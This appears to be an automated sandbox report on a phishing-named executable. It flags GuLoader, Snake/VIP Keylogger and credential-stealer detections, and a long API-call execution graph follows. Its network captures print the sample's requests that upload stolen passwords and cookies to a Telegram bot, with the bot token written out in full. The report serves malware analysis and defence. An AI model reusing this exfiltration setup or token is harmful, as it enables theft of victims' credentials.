                                                                                                                                                2024-11-21 08:01:55 UTC344INHTTP/1.1 404 Not Found
                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                Date: Thu, 21 Nov 2024 08:01:55 GMT
                                                                                                                                                Content-Type: application/json
                                                                                                                                                Content-Length: 55
                                                                                                                                                Connection: close
                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                2024-11-21 08:01:55 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                                                                Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                11192.168.2.449896149.154.167.2204437832C:\Users\user\Desktop\ORDER 20240986 OA.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-11-21 08:02:03 UTC344OUTPOST /bot7396856636:AAFzZvZlhz352HQorBY7sPxLQBc4vVQnrB8/sendDocument?chat_id=6553726543&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd0b4a7224cc3a
                                                                                                                                                Host: api.telegram.org
                                                                                                                                                Content-Length: 580
                                                                                                                                                2024-11-21 08:02:03 UTC580OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 62 34 61 37 32 32 34 63 63 33 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 39 37 35 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 31 2f 31 31 2f 32 30 32 34 20 2f 20 30 33 3a 30 31 3a 32 33 0d
                                                                                                                                                Data Ascii: --------------------------8dd0b4a7224cc3aContent-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:897506Date and Time: 21/11/2024 / 03:01:23
                                                                                                                                                2024-11-21 08:02:04 UTC388INHTTP/1.1 200 OK
                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                Date: Thu, 21 Nov 2024 08:02:04 GMT
                                                                                                                                                Content-Type: application/json
                                                                                                                                                Content-Length: 549
                                                                                                                                                Connection: close
                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                2024-11-21 08:02:04 UTC549INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 37 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 33 39 36 38 35 36 36 33 36 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4b 41 59 4d 41 53 54 45 52 53 20 4d 45 47 41 20 53 45 52 56 49 43 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4b 61 79 6d 61 73 74 65 72 73 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 35 35 33 37 32 36 35 34 33 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4a 6f 68 6e 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 44 6f 65 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 42 6c 61 63 6b 77 65 61 6c 74 68 30 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74
                                                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":178,"from":{"id":7396856636,"is_bot":true,"first_name":"KAYMASTERS MEGA SERVICE","username":"KaymastersBot"},"chat":{"id":6553726543,"first_name":"John","last_name":"Doe","username":"Blackwealth001","type":"private"},"dat


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                12192.168.2.449902149.154.167.2204437832C:\Users\user\Desktop\ORDER 20240986 OA.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-11-21 08:02:09 UTC350OUTPOST /bot7396856636:AAFzZvZlhz352HQorBY7sPxLQBc4vVQnrB8/sendDocument?chat_id=6553726543&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd0b6f4848dbcf
                                                                                                                                                Host: api.telegram.org
                                                                                                                                                Content-Length: 7045
                                                                                                                                                2024-11-21 08:02:09 UTC7045OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 62 36 66 34 38 34 38 64 62 63 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 6f 6f 6b 69 65 73 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 43 6f 6f 6b 69 65 73 20 7c 20 6a 6f 6e 65 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 39 37 35 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 31 2f 31 31 2f 32 30 32 34 20 2f
                                                                                                                                                Data Ascii: --------------------------8dd0b6f4848dbcfContent-Disposition: form-data; name="document"; filename="Cookies_Recovered.txt"Content-Type: application/x-ms-dos-executableCookies | user | VIP Recovery PC Name:897506Date and Time: 21/11/2024 /
                                                                                                                                                2024-11-21 08:02:10 UTC388INHTTP/1.1 200 OK
                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                Date: Thu, 21 Nov 2024 08:02:10 GMT
                                                                                                                                                Content-Type: application/json
                                                                                                                                                Content-Length: 560
                                                                                                                                                Connection: close
                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                2024-11-21 08:02:10 UTC560INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 37 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 33 39 36 38 35 36 36 33 36 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4b 41 59 4d 41 53 54 45 52 53 20 4d 45 47 41 20 53 45 52 56 49 43 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4b 61 79 6d 61 73 74 65 72 73 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 35 35 33 37 32 36 35 34 33 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4a 6f 68 6e 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 44 6f 65 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 42 6c 61 63 6b 77 65 61 6c 74 68 30 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74
                                                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":179,"from":{"id":7396856636,"is_bot":true,"first_name":"KAYMASTERS MEGA SERVICE","username":"KaymastersBot"},"chat":{"id":6553726543,"first_name":"John","last_name":"Doe","username":"Blackwealth001","type":"private"},"dat


                                                                                                                                                Click to jump to process

                                                                                                                                                Click to jump to process

                                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                                Click to jump to process

                                                                                                                                                Target ID:0
                                                                                                                                                Start time:02:59:59
                                                                                                                                                Start date:21/11/2024
                                                                                                                                                Path:C:\Users\user\Desktop\ORDER 20240986 OA.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:"C:\Users\user\Desktop\ORDER 20240986 OA.exe"
                                                                                                                                                Imagebase:0x400000
                                                                                                                                                File size:560'512 bytes
                                                                                                                                                MD5 hash:9F036462B07002EFDF646B0995217BBD
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: JoeSecurity_GuLoader_3, Description: Yara detected GuLoader, Source: 00000000.00000002.2287296673.000000000083C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2287809032.0000000003873000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                Reputation:low
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:4
                                                                                                                                                Start time:03:00:59
                                                                                                                                                Start date:21/11/2024
                                                                                                                                                Path:C:\Users\user\Desktop\ORDER 20240986 OA.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:"C:\Users\user\Desktop\ORDER 20240986 OA.exe"
                                                                                                                                                Imagebase:0x400000
                                                                                                                                                File size:560'512 bytes
                                                                                                                                                MD5 hash:9F036462B07002EFDF646B0995217BBD
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.2970820723.0000000037BD1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000004.00000002.2970820723.0000000037D51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000004.00000002.2970820723.0000000037D51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.2970820723.0000000037CDA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                Reputation:low
                                                                                                                                                Has exited:false

                                                                                                                                                Reset < >

                                                                                                                                                  Execution Graph

                                                                                                                                                  Execution Coverage:19%
                                                                                                                                                  Dynamic/Decrypted Code Coverage:13.7%
                                                                                                                                                  Signature Coverage:20.1%
                                                                                                                                                  Total number of Nodes:1557
                                                                                                                                                  Total number of Limit Nodes:38
                                                                                                                                                  execution_graph 3987 401941 3988 401943 3987->3988 3993 402c41 3988->3993 3994 402c4d 3993->3994 4039 4062b9 3994->4039 3997 401948 3999 4059a9 3997->3999 4081 405c74 3999->4081 4002 4059d1 DeleteFileW 4004 401951 4002->4004 4003 4059e8 4005 405b13 4003->4005 4095 406297 lstrcpynW 4003->4095 4005->4004 4124 4065da FindFirstFileW 4005->4124 4007 405a0e 4008 405a21 4007->4008 4009 405a14 lstrcatW 4007->4009 4096 405bb8 lstrlenW 4008->4096 4010 405a27 4009->4010 4013 405a37 lstrcatW 4010->4013 4014 405a2d 4010->4014 4016 405a42 lstrlenW FindFirstFileW 4013->4016 4014->4013 4014->4016 4018 405b08 4016->4018 4020 405a64 4016->4020 4017 405b31 4127 405b6c lstrlenW CharPrevW 4017->4127 4018->4005 4024 405aeb FindNextFileW 4020->4024 4032 4059a9 60 API calls 4020->4032 4034 4052ff 24 API calls 4020->4034 4100 406297 lstrcpynW 4020->4100 4101 405961 4020->4101 4109 4052ff 4020->4109 4120 40605d MoveFileExW 4020->4120 4022 405961 5 API calls 4025 405b43 4022->4025 4024->4020 4026 405b01 FindClose 4024->4026 4027 405b47 4025->4027 4028 405b5d 4025->4028 4026->4018 4027->4004 4031 4052ff 24 API calls 4027->4031 4030 4052ff 24 API calls 4028->4030 4030->4004 4033 405b54 4031->4033 4032->4020 4035 40605d 36 API calls 4033->4035 4034->4024 4036 405b5b 4035->4036 4036->4004 4052 4062c6 4039->4052 4040 406511 4041 402c6e 4040->4041 4072 406297 lstrcpynW 4040->4072 4041->3997 4056 40652b 4041->4056 4043 4064df lstrlenW 4043->4052 4046 4062b9 10 API calls 4046->4043 4047 4063f4 GetSystemDirectoryW 4047->4052 4049 406407 GetWindowsDirectoryW 4049->4052 4050 40652b 5 API calls 4050->4052 4051 406482 lstrcatW 4051->4052 4052->4040 4052->4043 4052->4046 4052->4047 4052->4049 4052->4050 4052->4051 4053 40643b SHGetSpecialFolderLocation 4052->4053 4054 4062b9 10 API calls 4052->4054 4065 406165 4052->4065 4070 4061de wsprintfW 4052->4070 4071 406297 lstrcpynW 4052->4071 4053->4052 4055 406453 SHGetPathFromIDListW CoTaskMemFree 4053->4055 4054->4052 4055->4052 4062 406538 4056->4062 4057 4065b3 CharPrevW 4058 4065ae 4057->4058 4058->4057 4060 4065d4 4058->4060 4059 4065a1 CharNextW 4059->4058 4059->4062 4060->3997 4062->4058 4062->4059 4063 40658d CharNextW 4062->4063 4064 40659c CharNextW 4062->4064 4077 405b99 4062->4077 4063->4062 4064->4059 4073 406104 4065->4073 4068 4061c9 4068->4052 4069 406199 RegQueryValueExW RegCloseKey 4069->4068 4070->4052 4071->4052 4072->4041 4074 406113 4073->4074 4075 406117 4074->4075 4076 40611c RegOpenKeyExW 4074->4076 4075->4068 4075->4069 4076->4075 4078 405b9f 4077->4078 4079 405bb5 4078->4079 4080 405ba6 CharNextW 4078->4080 4079->4062 4080->4078 4130 406297 lstrcpynW 4081->4130 4083 405c85 4131 405c17 CharNextW CharNextW 4083->4131 4086 4059c9 4086->4002 4086->4003 4087 40652b 5 API calls 4093 405c9b 4087->4093 4088 405ccc lstrlenW 4089 405cd7 4088->4089 4088->4093 4090 405b6c 3 API calls 4089->4090 4092 405cdc GetFileAttributesW 4090->4092 4091 4065da 2 API calls 4091->4093 4092->4086 4093->4086 4093->4088 4093->4091 4094 405bb8 2 API calls 4093->4094 4094->4088 4095->4007 4097 405bc6 4096->4097 4098 405bd8 4097->4098 4099 405bcc CharPrevW 4097->4099 4098->4010 4099->4097 4099->4098 4100->4020 4137 405d68 GetFileAttributesW 4101->4137 4104 40598e 4104->4020 4105 405984 DeleteFileW 4107 40598a 4105->4107 4106 40597c RemoveDirectoryW 4106->4107 4107->4104 4108 40599a SetFileAttributesW 4107->4108 4108->4104 4111 40531a 4109->4111 4119 4053bc 4109->4119 4110 405336 lstrlenW 4113 405344 lstrlenW 4110->4113 4114 40535f 4110->4114 4111->4110 4112 4062b9 17 API calls 4111->4112 4112->4110 4115 405356 lstrcatW 4113->4115 4113->4119 4116 405372 4114->4116 4117 405365 SetWindowTextW 4114->4117 4115->4114 4118 405378 SendMessageW SendMessageW SendMessageW 4116->4118 4116->4119 4117->4116 4118->4119 4119->4020 4121 40607e 4120->4121 4122 406071 4120->4122 4121->4020 4140 405ee3 4122->4140 4125 4065f0 FindClose 4124->4125 4126 405b2d 4124->4126 4125->4126 4126->4004 4126->4017 4128 405b37 4127->4128 4129 405b88 lstrcatW 4127->4129 4128->4022 4129->4128 4130->4083 4132 405c34 4131->4132 4135 405c46 4131->4135 4134 405c41 CharNextW 4132->4134 4132->4135 4133 405c6a 4133->4086 4133->4087 4134->4133 4135->4133 4136 405b99 CharNextW 4135->4136 4136->4135 4138 40596d 4137->4138 4139 405d7a SetFileAttributesW 4137->4139 4138->4104 4138->4105 4138->4106 4139->4138 4141 405f13 4140->4141 4142 405f39 GetShortPathNameW 4140->4142 4167 405d8d GetFileAttributesW CreateFileW 4141->4167 4144 406058 4142->4144 4145 405f4e 4142->4145 4144->4121 4145->4144 4147 405f56 wsprintfA 4145->4147 4146 405f1d CloseHandle GetShortPathNameW 4146->4144 4148 405f31 4146->4148 4149 4062b9 17 API calls 4147->4149 4148->4142 4148->4144 4150 405f7e 4149->4150 4168 405d8d GetFileAttributesW CreateFileW 4150->4168 4152 405f8b 4152->4144 4153 405f9a GetFileSize GlobalAlloc 4152->4153 4154 406051 CloseHandle 4153->4154 4155 405fbc 4153->4155 4154->4144 4169 405e10 ReadFile 4155->4169 4160 405fdb lstrcpyA 4162 405ffd 4160->4162 4161 405fef 4163 405cf2 4 API calls 4161->4163 4164 406034 SetFilePointer 4162->4164 4163->4162 4176 405e3f WriteFile 4164->4176 4167->4146 4168->4152 4170 405e2e 4169->4170 4170->4154 4171 405cf2 lstrlenA 4170->4171 4172 405d33 lstrlenA 4171->4172 4173 405d3b 4172->4173 4174 405d0c lstrcmpiA 4172->4174 4173->4160 4173->4161 4174->4173 4175 405d2a CharNextA 4174->4175 4175->4172 4177 405e5d GlobalFree 4176->4177 4177->4154 4178 4015c1 4179 402c41 17 API calls 4178->4179 4180 4015c8 4179->4180 4181 405c17 4 API calls 4180->4181 4193 4015d1 4181->4193 4182 401631 4184 401663 4182->4184 4185 401636 4182->4185 4183 405b99 CharNextW 4183->4193 4187 401423 24 API calls 4184->4187 4205 401423 4185->4205 4194 40165b 4187->4194 4191 40164a SetCurrentDirectoryW 4191->4194 4193->4182 4193->4183 4195 401617 GetFileAttributesW 4193->4195 4197 405868 4193->4197 4200 4057ce CreateDirectoryW 4193->4200 4209 40584b CreateDirectoryW 4193->4209 4195->4193 4212 406671 GetModuleHandleA 4197->4212 4201 40581b 4200->4201 4202 40581f GetLastError 4200->4202 4201->4193 4202->4201 4203 40582e SetFileSecurityW 4202->4203 4203->4201 4204 405844 GetLastError 4203->4204 4204->4201 4206 4052ff 24 API calls 4205->4206 4207 401431 4206->4207 4208 406297 lstrcpynW 4207->4208 4208->4191 4210 40585b 4209->4210 4211 40585f GetLastError 4209->4211 4210->4193 4211->4210 4213 406697 GetProcAddress 4212->4213 4214 40668d 4212->4214 4216 40586f 4213->4216 4218 406601 GetSystemDirectoryW 4214->4218 4216->4193 4217 406693 4217->4213 4217->4216 4219 406623 wsprintfW LoadLibraryExW 4218->4219 4219->4217 5015 404344 lstrcpynW lstrlenW 5016 403945 5017 403950 5016->5017 5018 403954 5017->5018 5019 403957 GlobalAlloc 5017->5019 5019->5018 5020 6fbb103d 5023 6fbb101b 5020->5023 5030 6fbb1516 5023->5030 5025 6fbb1020 5026 6fbb1027 GlobalAlloc 5025->5026 5027 6fbb1024 5025->5027 5026->5027 5028 6fbb153d 3 API calls 5027->5028 5029 6fbb103b 5028->5029 5032 6fbb151c 5030->5032 5031 6fbb1522 5031->5025 5032->5031 5033 6fbb152e GlobalFree 5032->5033 5033->5025 4294 401e49 4295 402c1f 17 API calls 4294->4295 4296 401e4f 4295->4296 4297 402c1f 17 API calls 4296->4297 4298 401e5b 4297->4298 4299 401e72 EnableWindow 4298->4299 4300 401e67 ShowWindow 4298->4300 4301 402ac5 4299->4301 4300->4301 5034 40264a 5035 402c1f 17 API calls 5034->5035 5036 402659 5035->5036 5037 4026a3 ReadFile 5036->5037 5038 405e10 ReadFile 5036->5038 5040 4026e3 MultiByteToWideChar 5036->5040 5041 402798 5036->5041 5043 402709 SetFilePointer MultiByteToWideChar 5036->5043 5044 4027a9 5036->5044 5046 402796 5036->5046 5047 405e6e SetFilePointer 5036->5047 5037->5036 5037->5046 5038->5036 5040->5036 5056 4061de wsprintfW 5041->5056 5043->5036 5045 4027ca SetFilePointer 5044->5045 5044->5046 5045->5046 5048 405ea2 5047->5048 5049 405e8a 5047->5049 5048->5036 5050 405e10 ReadFile 5049->5050 5051 405e96 5050->5051 5051->5048 5052 405ed3 SetFilePointer 5051->5052 5053 405eab SetFilePointer 5051->5053 5052->5048 5053->5052 5054 405eb6 5053->5054 5055 405e3f WriteFile 5054->5055 5055->5048 5056->5046 5060 4016cc 5061 402c41 17 API calls 5060->5061 5062 4016d2 GetFullPathNameW 5061->5062 5063 4016ec 5062->5063 5069 40170e 5062->5069 5066 4065da 2 API calls 5063->5066 5063->5069 5064 401723 GetShortPathNameW 5065 402ac5 5064->5065 5067 4016fe 5066->5067 5067->5069 5070 406297 lstrcpynW 5067->5070 5069->5064 5069->5065 5070->5069 5071 4043cd 5073 4043e5 5071->5073 5076 4044ff 5071->5076 5072 404569 5074 404633 5072->5074 5075 404573 GetDlgItem 5072->5075 5077 40420e 18 API calls 5073->5077 5082 404275 8 API calls 5074->5082 5078 4045f4 5075->5078 5079 40458d 5075->5079 5076->5072 5076->5074 5080 40453a GetDlgItem SendMessageW 5076->5080 5081 40444c 5077->5081 5078->5074 5086 404606 5078->5086 5079->5078 5085 4045b3 SendMessageW LoadCursorW SetCursor 5079->5085 5104 404230 EnableWindow 5080->5104 5084 40420e 18 API calls 5081->5084 5093 40462e 5082->5093 5088 404459 CheckDlgButton 5084->5088 5108 40467c 5085->5108 5090 40461c 5086->5090 5091 40460c SendMessageW 5086->5091 5087 404564 5105 404658 5087->5105 5102 404230 EnableWindow 5088->5102 5092 404622 SendMessageW 5090->5092 5090->5093 5091->5090 5092->5093 5097 404477 GetDlgItem 5103 404243 SendMessageW 5097->5103 5099 40448d SendMessageW 5100 4044b3 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5099->5100 5101 4044aa GetSysColor 5099->5101 5100->5093 5101->5100 5102->5097 5103->5099 5104->5087 5106 404666 5105->5106 5107 40466b SendMessageW 5105->5107 5106->5107 5107->5072 5111 4058c3 ShellExecuteExW 5108->5111 5110 4045e2 LoadCursorW SetCursor 5110->5078 5111->5110 5112 40234e 5113 402c41 17 API calls 5112->5113 5114 40235d 5113->5114 5115 402c41 17 API calls 5114->5115 5116 402366 5115->5116 5117 402c41 17 API calls 5116->5117 5118 402370 GetPrivateProfileStringW 5117->5118 5119 401b53 5120 402c41 17 API calls 5119->5120 5121 401b5a 5120->5121 5122 402c1f 17 API calls 5121->5122 5123 401b63 wsprintfW 5122->5123 5124 402ac5 5123->5124 5125 404a55 5126 404a81 5125->5126 5127 404a65 5125->5127 5129 404ab4 5126->5129 5130 404a87 SHGetPathFromIDListW 5126->5130 5136 4058e1 GetDlgItemTextW 5127->5136 5132 404a9e SendMessageW 5130->5132 5133 404a97 5130->5133 5131 404a72 SendMessageW 5131->5126 5132->5129 5134 40140b 2 API calls 5133->5134 5134->5132 5136->5131 5137 401956 5138 402c41 17 API calls 5137->5138 5139 40195d lstrlenW 5138->5139 5140 402592 5139->5140 4924 4014d7 4925 402c1f 17 API calls 4924->4925 4926 4014dd Sleep 4925->4926 4928 402ac5 4926->4928 5141 401f58 5142 402c41 17 API calls 5141->5142 5143 401f5f 5142->5143 5144 4065da 2 API calls 5143->5144 5145 401f65 5144->5145 5147 401f76 5145->5147 5148 4061de wsprintfW 5145->5148 5148->5147 5149 402259 5150 402c41 17 API calls 5149->5150 5151 40225f 5150->5151 5152 402c41 17 API calls 5151->5152 5153 402268 5152->5153 5154 402c41 17 API calls 5153->5154 5155 402271 5154->5155 5156 4065da 2 API calls 5155->5156 5157 40227a 5156->5157 5158 40228b lstrlenW lstrlenW 5157->5158 5163 40227e 5157->5163 5160 4052ff 24 API calls 5158->5160 5159 4052ff 24 API calls 5162 402286 5159->5162 5161 4022c9 SHFileOperationW 5160->5161 5161->5162 5161->5163 5163->5159 5009 40175c 5010 402c41 17 API calls 5009->5010 5011 401763 5010->5011 5012 405dbc 2 API calls 5011->5012 5013 40176a 5012->5013 5014 405dbc 2 API calls 5013->5014 5014->5013 5164 4022dd 5165 4022e4 5164->5165 5168 4022f7 5164->5168 5166 4062b9 17 API calls 5165->5166 5167 4022f1 5166->5167 5169 4058fd MessageBoxIndirectW 5167->5169 5169->5168 5170 401d5d GetDlgItem GetClientRect 5171 402c41 17 API calls 5170->5171 5172 401d8f LoadImageW SendMessageW 5171->5172 5173 401dad DeleteObject 5172->5173 5174 402ac5 5172->5174 5173->5174 5175 401563 5176 402a6b 5175->5176 5179 4061de wsprintfW 5176->5179 5178 402a70 5179->5178 4225 4023e4 4226 402c41 17 API calls 4225->4226 4227 4023f6 4226->4227 4228 402c41 17 API calls 4227->4228 4229 402400 4228->4229 4242 402cd1 4229->4242 4232 402438 4238 402444 4232->4238 4246 402c1f 4232->4246 4233 402c41 17 API calls 4235 40242e lstrlenW 4233->4235 4234 40288b 4235->4232 4237 402463 RegSetValueExW 4240 402479 RegCloseKey 4237->4240 4238->4237 4249 403116 4238->4249 4240->4234 4243 402cec 4242->4243 4269 406132 4243->4269 4247 4062b9 17 API calls 4246->4247 4248 402c34 4247->4248 4248->4238 4250 40312f 4249->4250 4251 40315d 4250->4251 4276 403324 SetFilePointer 4250->4276 4273 40330e 4251->4273 4255 4032a7 4257 4032e9 4255->4257 4262 4032ab 4255->4262 4256 40317a GetTickCount 4258 403291 4256->4258 4265 4031a6 4256->4265 4259 40330e ReadFile 4257->4259 4258->4237 4259->4258 4260 40330e ReadFile 4260->4265 4261 40330e ReadFile 4261->4262 4262->4258 4262->4261 4263 405e3f WriteFile 4262->4263 4263->4262 4264 4031fc GetTickCount 4264->4265 4265->4258 4265->4260 4265->4264 4266 403221 MulDiv wsprintfW 4265->4266 4268 405e3f WriteFile 4265->4268 4267 4052ff 24 API calls 4266->4267 4267->4265 4268->4265 4270 406141 4269->4270 4271 402410 4270->4271 4272 40614c RegCreateKeyExW 4270->4272 4271->4232 4271->4233 4271->4234 4272->4271 4274 405e10 ReadFile 4273->4274 4275 403168 4274->4275 4275->4255 4275->4256 4275->4258 4276->4251 5180 402868 5181 402c41 17 API calls 5180->5181 5182 40286f FindFirstFileW 5181->5182 5183 402882 5182->5183 5184 402897 5182->5184 5188 4061de wsprintfW 5184->5188 5186 4028a0 5189 406297 lstrcpynW 5186->5189 5188->5186 5189->5183 5190 401968 5191 402c1f 17 API calls 5190->5191 5192 40196f 5191->5192 5193 402c1f 17 API calls 5192->5193 5194 40197c 5193->5194 5195 402c41 17 API calls 5194->5195 5196 401993 lstrlenW 5195->5196 5197 4019a4 5196->5197 5200 4019e5 5197->5200 5202 406297 lstrcpynW 5197->5202 5199 4019d5 5199->5200 5201 4019da lstrlenW 5199->5201 5201->5200 5202->5199 5203 40166a 5204 402c41 17 API calls 5203->5204 5205 401670 5204->5205 5206 4065da 2 API calls 5205->5206 5207 401676 5206->5207 4302 6fbb2997 4303 6fbb29e7 4302->4303 4304 6fbb29a7 VirtualProtect 4302->4304 4304->4303 4305 40336c SetErrorMode GetVersion 4306 4033ab 4305->4306 4307 4033b1 4305->4307 4308 406671 5 API calls 4306->4308 4309 406601 3 API calls 4307->4309 4308->4307 4310 4033c7 lstrlenA 4309->4310 4310->4307 4311 4033d7 4310->4311 4312 406671 5 API calls 4311->4312 4313 4033de 4312->4313 4314 406671 5 API calls 4313->4314 4315 4033e5 4314->4315 4316 406671 5 API calls 4315->4316 4317 4033f1 #17 OleInitialize SHGetFileInfoW 4316->4317 4395 406297 lstrcpynW 4317->4395 4320 40343d GetCommandLineW 4396 406297 lstrcpynW 4320->4396 4322 40344f 4323 405b99 CharNextW 4322->4323 4324 403474 CharNextW 4323->4324 4325 40359e GetTempPathW 4324->4325 4336 40348d 4324->4336 4397 40333b 4325->4397 4327 4035b6 4328 403610 DeleteFileW 4327->4328 4329 4035ba GetWindowsDirectoryW lstrcatW 4327->4329 4407 402edd GetTickCount GetModuleFileNameW 4328->4407 4330 40333b 12 API calls 4329->4330 4333 4035d6 4330->4333 4331 405b99 CharNextW 4331->4336 4333->4328 4335 4035da GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4333->4335 4334 403624 4344 405b99 CharNextW 4334->4344 4377 4036c7 4334->4377 4390 4036d7 4334->4390 4337 40333b 12 API calls 4335->4337 4336->4331 4338 403589 4336->4338 4339 403587 4336->4339 4342 